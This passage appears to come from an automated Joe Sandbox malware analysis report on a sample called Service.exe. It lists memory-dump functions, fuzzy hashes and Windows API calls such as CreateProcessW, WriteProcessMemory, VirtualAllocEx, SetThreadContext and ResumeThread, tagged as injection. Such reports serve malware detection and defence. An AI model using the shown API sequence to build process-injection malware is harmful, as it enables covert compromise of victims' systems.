CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 011B5011

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: dcf93362463077420c24eaada26319ab36a08060e231a5afc17cfeb582bb9c5a
Instruction ID: f3eea0490e823ad05413b2f5d4862dfce065ff5b3d90c3d04e22771905b6d307
Opcode Fuzzy Hash: dcf93362463077420c24eaada26319ab36a08060e231a5afc17cfeb582bb9c5a
Instruction Fuzzy Hash: DA81D2B4D002698FDF25CFA9C984BDDBBF5BB09300F1490AAE508B7210DB30AA85CF55

Function 011B3EDC Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 011B5E49

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 71fc7ee242b6fea5af2caf54bb8f3d0b0cca5528e6fa028f0a9a5e359a56b3dd
Instruction ID: 71aec639f645e217c0d30cd20f8f18696d17c5ccdf3ba43250a5ebc99d8f8b00
Opcode Fuzzy Hash: 71fc7ee242b6fea5af2caf54bb8f3d0b0cca5528e6fa028f0a9a5e359a56b3dd
Instruction Fuzzy Hash: D881D2B4D0022DDFDB65CFA9C984BDDBBF5AB09300F1091AAE508B7260DB709A85CF55

Function 011B5C6C Relevance: 1.7, APIs: 1, Instructions: 222
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 011B5E49

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 193cf61c5cc350a5d0b60ae409c0a8877aed6f5887f956aba1337e696af4d377
Instruction ID: 6f4d299cbe19272ab8029a77a75551f5bc963bc008182419fdd89b9319bc8928
Opcode Fuzzy Hash: 193cf61c5cc350a5d0b60ae409c0a8877aed6f5887f956aba1337e696af4d377
Instruction Fuzzy Hash: 3781D2B4D00269CFDB65CFA9C984BDDBBF5BB09300F1491AAE508B7260DB309A85CF55

Function 011B6EA4 Relevance: 1.7, APIs: 1, Instructions: 222processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 011B7081

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2fe7c2fcd9106b24716ba8983146341e4c73f14554985a8f1ae2c0f5a0fa2f0e
Instruction ID: e352014f34dbe798f492109a3da79dbbc2126d16932cda1ef6db5eefc4a96edc
Opcode Fuzzy Hash: 2fe7c2fcd9106b24716ba8983146341e4c73f14554985a8f1ae2c0f5a0fa2f0e
Instruction Fuzzy Hash: F481D3B4D00259CFDB25CFA9C884BEDBBF5BB49300F1491AAE508B7250DB709A89CF55

Function 011B07EC Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 011B22C6

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6e02d98182a4456fdf3398fc7982f5dbe0ce4849b3cc39f184e28d859e67c21f
Instruction ID: ae64bf2fb8892add86a6caea5036532cc93cb249c3dc638925ac25b6bd9e8dfc
Opcode Fuzzy Hash: 6e02d98182a4456fdf3398fc7982f5dbe0ce4849b3cc39f184e28d859e67c21f
Instruction Fuzzy Hash: 134177B5D042589FCB04CFA9D984ADEFBF1BB19310F24906AE918B7210D375AA45CB64

Function 011B21F0 Relevance: 1.6, APIs: 1, Instructions: 111injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 011B22C6

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b432cdbe9ca28e57ed27d6b05800370c32aef32905e63ba00b46106c7ef7bcd0
Instruction ID: 1e868e7aabcd3b0ba64a4fff35ea1bee2d00c33b5c78b3b4a24bcfe449311d56
Opcode Fuzzy Hash: b432cdbe9ca28e57ed27d6b05800370c32aef32905e63ba00b46106c7ef7bcd0
Instruction Fuzzy Hash: F44189B9D04258DFCB04CFA9D984ADEFBF1BB09310F24902AE918B7210D334AA45CF64

Function 011B07C8 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 011B2085

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 30ac68b4741d0fad346d71263a57d1f26c8e3b6d11cebe9c0d95172da7684fd3
Instruction ID: ea6a19c4a68941b090bb84735cad947263c8a7620b351b2789e2a1729edaa63b
Opcode Fuzzy Hash: 30ac68b4741d0fad346d71263a57d1f26c8e3b6d11cebe9c0d95172da7684fd3
Instruction Fuzzy Hash: 584196B9D04258DFCF14CFAAD984ADEFBB1BB19310F10A02AE814B7210D375AA45CF65

Function 011B1FD0 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 011B2085

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e0131884cd4b5925f372abe940830d941b397b3688e9529c82efda0932bb7ff2
Instruction ID: db3951adce38e488ccce6a5d11098499be377650671834dec5079d7bf46969ef
Opcode Fuzzy Hash: e0131884cd4b5925f372abe940830d941b397b3688e9529c82efda0932bb7ff2
Instruction Fuzzy Hash: CF3187B9D04258DFCF10CFA9D984ADEFBB1BB19310F14A02AE818B7210D375AA45CF65

Function 011B20E8 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 011B2195

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d803a6ac6edf276b644562c5cb5e2c523e25f3f830ea9c7ef558e408d3dcfabf
Instruction ID: e2c2c5c707b1ffc143cb023aa50a7c1ca73750738952ce297def47543f0cafd7
Opcode Fuzzy Hash: d803a6ac6edf276b644562c5cb5e2c523e25f3f830ea9c7ef558e408d3dcfabf
Instruction Fuzzy Hash: A63165B9D042589FCF14CFA9D984ADEFBB5BB19310F10A02AE914B7310D335A946CF65

Function 011B07E0 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 011B2195

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e493b43b5d18ca7b251af69e71212bb23a4d1b7dc2d567f61a569227212d3868
Instruction ID: 129bcbd0fb33f11920293e3152bd1343afdb86f6cc56f03738f2b839ac0e1cd2
Opcode Fuzzy Hash: e493b43b5d18ca7b251af69e71212bb23a4d1b7dc2d567f61a569227212d3868
Instruction Fuzzy Hash: 893165B9D042589FCF14CFA9D984ADEFBB5AB19310F10A02AE914B7310D335A946CF65

Function 011B07B0 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 011B1F72

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e0f6b6a61c8a7cfcf7d12273ff8ce561c76abe452132452a0dab94b9937995e7
Instruction ID: 396d47c4cbc8257f2dbf431b6d4f5fe1a4a8d9fd54dc7d38a34e883ee053d233
Opcode Fuzzy Hash: e0f6b6a61c8a7cfcf7d12273ff8ce561c76abe452132452a0dab94b9937995e7
Instruction Fuzzy Hash: 4131ABB5D012589FCB14CFA9E584ADEFBF5BB49310F24802AE414B7250D378AA49CF65

Function 011B07F8 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 011B1F72

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 719b6cab8f5b7f537f7210547a46777b72b87efccf122f35ccfa7850eca48490
Instruction ID: e6682f05b2c280b354cb5ed855a264e104cf0aea4a52999e7c1eba314d925f5c
Opcode Fuzzy Hash: 719b6cab8f5b7f537f7210547a46777b72b87efccf122f35ccfa7850eca48490
Instruction Fuzzy Hash: E431ABB5D012589FCB14CFA9E584ADEFBF1FB49310F24802AE414B7250D378AA49CF55

Function 011B1EC1 Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 011B1F72

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9abbc38081e8df4472b0959766265ff8a39e36d7fb9af256b135069d8244f5e0
Instruction ID: 36fd90b5aa95db1474051d5eeee8176b209a0dff70b5385dad8d6364eb9cffa9
Opcode Fuzzy Hash: 9abbc38081e8df4472b0959766265ff8a39e36d7fb9af256b135069d8244f5e0
Instruction Fuzzy Hash: 25319BB5D012589FCB14CFA9E584ADEFBF1BB49310F14802AE414B7250D378AA49CF65

Function 011B0810 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 011B23AE

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f410f82c46573091840cc37aa7fcf29177a7fe144667c2433c77b1a6ab5ca4d7
Instruction ID: 94c76c8b71c2b48187312791feeca73cb2f03acfacba2151434936dc8d6db35d
Opcode Fuzzy Hash: f410f82c46573091840cc37aa7fcf29177a7fe144667c2433c77b1a6ab5ca4d7
Instruction Fuzzy Hash: 8221A8B8D052199FCB14CFA9D584ADEFBF4EB09320F20905AE918B7310D375A945CFA5

Function 011B2331 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 011B23AE

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 367a4dc5dd51110279edb1eee49680e949ba22e74415cdd24a5d63164eac46c7
Instruction ID: ebe5307b50252a33f8eb54028c47e015951a4dd406a1b6abb3e29be01c783d47
Opcode Fuzzy Hash: 367a4dc5dd51110279edb1eee49680e949ba22e74415cdd24a5d63164eac46c7
Instruction Fuzzy Hash: 1521A8B9D042199FCB14CFA9D584ADEFBF4EB09320F24905AE818B7310D335A945CFA5

Analysis Process: Service.exePID: 6512, Parent PID: 1360COMMON

Executed Functions

Function 00D40EC0 Relevance: 2.8, Strings: 2, Instructions: 283COMMON

Download Yara Rule

Strings

Xaq, xrefs: 00D40EFF
$]q, xrefs: 00D40EE6

Memory Dump Source

Source File: 0000000C.00000002.2268722051.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Service.jbxd

Similarity

API ID:
String ID: Xaq$$]q
API String ID: 0-1280934391
Opcode ID: 19d6c79e44d249f87f3e8e7e01781c5f0fe146dc23d83464ca4bfca16957c68e
Instruction ID: 30cac02f2b8aa042458972aadc87140964ef102088bd9bd88b8757468846483c
Opcode Fuzzy Hash: 19d6c79e44d249f87f3e8e7e01781c5f0fe146dc23d83464ca4bfca16957c68e
Instruction Fuzzy Hash: 60918D74F00218ABCB489F78985477E7BB7BFC8710B14856AE54BE7394DE34884297A2

Function 00D40901 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

Haq, xrefs: 00D4095D

Memory Dump Source

Source File: 0000000C.00000002.2268722051.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Service.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: f46b526ce49355b293fc84c6c7e761beebc1de845d472533b508f7a6b2b607fd
Instruction ID: 176e6dc8619f64ab583670fc766591b6a10bd58993c60a50b2adcec8463324d7
Opcode Fuzzy Hash: f46b526ce49355b293fc84c6c7e761beebc1de845d472533b508f7a6b2b607fd
Instruction Fuzzy Hash: 7D21A430A082488FCB44EFB8886576E7FF1AF85300F1544BED549DB296EA349E05CB92

Function 00D41304 Relevance: .5, Instructions: 517COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2268722051.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 306fdda0a8644cbd1e7bedb3710e68d82ffd8193180dfb12b1f853551f769ca4
Instruction ID: 64076d455f7d0c3ff0efba9ea923310943888b20b9c1540471ebd6ca1be28cea
Opcode Fuzzy Hash: 306fdda0a8644cbd1e7bedb3710e68d82ffd8193180dfb12b1f853551f769ca4
Instruction Fuzzy Hash: 9031D17490024ADFCB02EFB4D8557AD7FB2FF88304F204AA9E005A7265EB706995CB61

Function 00D40BD8 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2268722051.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c01999418189e4e8954f4d7200437d8e69328928d452c7e571728a884fbed4c8
Instruction ID: 4f839e6024736468db691e396870db62bf3139e60e714bfee3616a830ef50a7d
Opcode Fuzzy Hash: c01999418189e4e8954f4d7200437d8e69328928d452c7e571728a884fbed4c8
Instruction Fuzzy Hash: 8B4187756006478FCB1AFF78E85862E7BA2FF843003104A69E50687695EF74AC05CB92

Function 00D40BD7 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2268722051.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3324e9dca8980d5ed977c8035db2da2712828bd364aafa020cbf0db2188a2fe
Instruction ID: d10aa3fa523bd0ccc174bee4cb98719241ffb218d56898997ac1f542e5385e64
Opcode Fuzzy Hash: f3324e9dca8980d5ed977c8035db2da2712828bd364aafa020cbf0db2188a2fe
Instruction Fuzzy Hash: 844172756006078FCB19EF79E85867E7BA2FB843003104A6CE4168B695EF74AD05CF92

Function 00D41771 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2268722051.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 472c930474fdd14c6644f8d5e3637773ad6f14715c748ddfff3884ea01823ba4
Instruction ID: 8d48e97274ef54f40b139e9a497f1cbf3717287c93795242bfdb9e9cdeca8cfb
Opcode Fuzzy Hash: 472c930474fdd14c6644f8d5e3637773ad6f14715c748ddfff3884ea01823ba4
Instruction Fuzzy Hash: B721D374B0424A9FCB05EFBD485826EBFE6EFC9300B15447DD14AD7291DE349D0587A1

Function 00D40DD7 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2268722051.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d62ed87335210a7a208a531249bcfa502ef9e82a16ccb7dc71325f437bb5d81b
Instruction ID: 07be3e29485f6cdf3079e5deff693563184a41a441ac49f58d5bde6330d3afad
Opcode Fuzzy Hash: d62ed87335210a7a208a531249bcfa502ef9e82a16ccb7dc71325f437bb5d81b
Instruction Fuzzy Hash: F8217C34B001059FDB54DB79D858B6E7BE2FFC8710F2584A8E506EB3A6CA71AC018B91

Function 00D41660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2268722051.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6ee1b09547bff2f3a168135c600a20eb7977b4c0fee62cea0622d130db7e23
Instruction ID: 0416d94d44242878bf22a414822c963c3dfaa40c5fad805974802e403a61be67
Opcode Fuzzy Hash: 5e6ee1b09547bff2f3a168135c600a20eb7977b4c0fee62cea0622d130db7e23
Instruction Fuzzy Hash: 7421567490020ADFCB05FFB4D8457AD7BB6FF88304F204A69E505A7354EB706A95CB61

Function 00D40CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2268722051.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbbc2084966f97bf3304bd6c70a66a5c9c6e533f206ecf0e9b4d25b283e3adba
Instruction ID: a1d947913ffb36cfcb1fb5183611b6e02b992a98e2d6c95cfd960be4dce6e23d
Opcode Fuzzy Hash: cbbc2084966f97bf3304bd6c70a66a5c9c6e533f206ecf0e9b4d25b283e3adba
Instruction Fuzzy Hash: 5F2142717006464BCB6AEB79845823E7AE2FFC42143108E2DD56A8B790DF34ED158BD2

Function 00D40847 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2268722051.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b980639da7e4eb125d50daaf42559d9de4b22a51bf42407fc349d5d2c31ebeb5
Instruction ID: 05e8f2f0e9da9de73d05d6bbe45fe9d6f8d2df9c778d3069399ae2e991895ef8
Opcode Fuzzy Hash: b980639da7e4eb125d50daaf42559d9de4b22a51bf42407fc349d5d2c31ebeb5
Instruction Fuzzy Hash: 04119B74501A079FCB46EF28F980A597BA6FB88304B209ED8B4048B239F6B46955CF90

Function 00D40848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2268722051.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d672c1c5aaab43236cf3350c9a4e132c105977e42dfdcee0de984de388cd0d
Instruction ID: 032896a05fa37db75edee6bc0e4139214279182558b6977432f85982d65adf90
Opcode Fuzzy Hash: 95d672c1c5aaab43236cf3350c9a4e132c105977e42dfdcee0de984de388cd0d
Instruction Fuzzy Hash: 2C01A974501A0B9FCB46FF28F980A5977A6FB88304B209ED4B4088B239F6B47D55CF90

Analysis Process: Service.exePID: 1436, Parent PID: 1360COMMON

Executed Functions

Function 023E1304 Relevance: .5, Instructions: 496COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2270440274.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_23e0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f619085c50f02038a5dc2091267a6590270a8d95875473c60b2e5530a6ac4422
Instruction ID: a25455c3ba50ecbdb389b3368ca1723d1294e41b2baff4a80c1ed65f0f1db6f7
Opcode Fuzzy Hash: f619085c50f02038a5dc2091267a6590270a8d95875473c60b2e5530a6ac4422
Instruction Fuzzy Hash: 7F31B174900249DFCB01EFB8D854AAD7BB2FF84300F2049A9D005A7365DB34599ADF51

Function 023E0BD8 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2270440274.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_23e0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a657c8814b35c83ac19cf94fc32183eee3b906227a81543169a0cf123490fb6
Instruction ID: 8d59c66647efe2b8de165c917f939d7a194a04600ef1a7b4bfb8cb35f0c4d3ed
Opcode Fuzzy Hash: 9a657c8814b35c83ac19cf94fc32183eee3b906227a81543169a0cf123490fb6
Instruction Fuzzy Hash: DF719071B002068FCB59EFB8E458A6E7BB3FF84311B104979E5069B3A5DF749C168B81

Function 023E0BCB Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2270440274.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_23e0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 277bb4c80f69bcdbac34aa7d5d9ba2ceb65a9fb2842145e87c90d76bfc7ae852
Instruction ID: 52a7b3dc0b947e02685935aae6d7f1a4ac6737f0b9cb3540e8b83ac4220bd730
Opcode Fuzzy Hash: 277bb4c80f69bcdbac34aa7d5d9ba2ceb65a9fb2842145e87c90d76bfc7ae852
Instruction Fuzzy Hash: 3C41A071A002028FCB5AEB78E45C96EBBA2FF843117104D39D4179B795EF74981A8F81

Function 023E1771 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2270440274.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_23e0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7410450a5bce68417c60ae98e64406d6184b117818f97bfdb0609e7e63049a
Instruction ID: a1966a6c65f1ff0e363e1e110aaf1c49d707188fc25c18a447f02bfcb72d8d0f
Opcode Fuzzy Hash: 6e7410450a5bce68417c60ae98e64406d6184b117818f97bfdb0609e7e63049a
Instruction Fuzzy Hash: FF217F71B002155FCB48EFBD88542BEBAEBEFC8310B11442DD54AD7385DE348C168B61

Function 023E1660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2270440274.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_23e0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68acc7ff448fd91d8ea21b6df17a1c65c2b4dd94a253c4ef68afb50dd5987eb2
Instruction ID: fc69f6e24dc465dac40b3ceb6e9d5334b3e9b2a11fd845b02871e803a75957c7
Opcode Fuzzy Hash: 68acc7ff448fd91d8ea21b6df17a1c65c2b4dd94a253c4ef68afb50dd5987eb2
Instruction Fuzzy Hash: 67217F74D0020ADFCB05EFB8D844AADBBB2FF84300F204969E505A7354DB746A9ADF91

Function 023E0CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2270440274.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_23e0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52be391e976012ede54dc4ad38344f55fe3899bb0c9da6484dceca38372f814f
Instruction ID: 2ae12cd3ded85bfe11c97e0b245ecfc54800f6bdcb8a61b94d8fe87cfb60a654
Opcode Fuzzy Hash: 52be391e976012ede54dc4ad38344f55fe3899bb0c9da6484dceca38372f814f
Instruction Fuzzy Hash: 08214C72B00A024BCB5AEB79941816EB6E3BF846143108D2DD56B9B680DF74EC198B82

Function 023E0838 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2270440274.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_23e0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f94a90340ab5f3123394a27cad9758a195715546a2d61121a636937059067471
Instruction ID: 12516a1db3eea94190ca8b654424cc463d68e857a61555c6c9e12e66e671cbb8
Opcode Fuzzy Hash: f94a90340ab5f3123394a27cad9758a195715546a2d61121a636937059067471
Instruction Fuzzy Hash: 6B11A8745015469FCB42EB68F980E993BA6EB44305F209E58E4088B33AD6746D6FEF81

Function 023E0848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2270440274.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_23e0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d41bbb88640dadebca7dfadf3d2e0732f8d5bf04c5f006fb26ce84ab8f1a6ead
Instruction ID: 243bafa7e68e05633665cbfb585b52e25adba465b7670c8f9062989232374e5c
Opcode Fuzzy Hash: d41bbb88640dadebca7dfadf3d2e0732f8d5bf04c5f006fb26ce84ab8f1a6ead
Instruction Fuzzy Hash: FC01DB7450060A9FCB02FF58F880E5937A6FB44305B208E68B4048B339E674695FAF81

Function 023E0901 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2270440274.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_23e0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 398949954a7bc9f55bb586c1c68ab0990542ee4991d5c4a6ad4934d33d5dc093
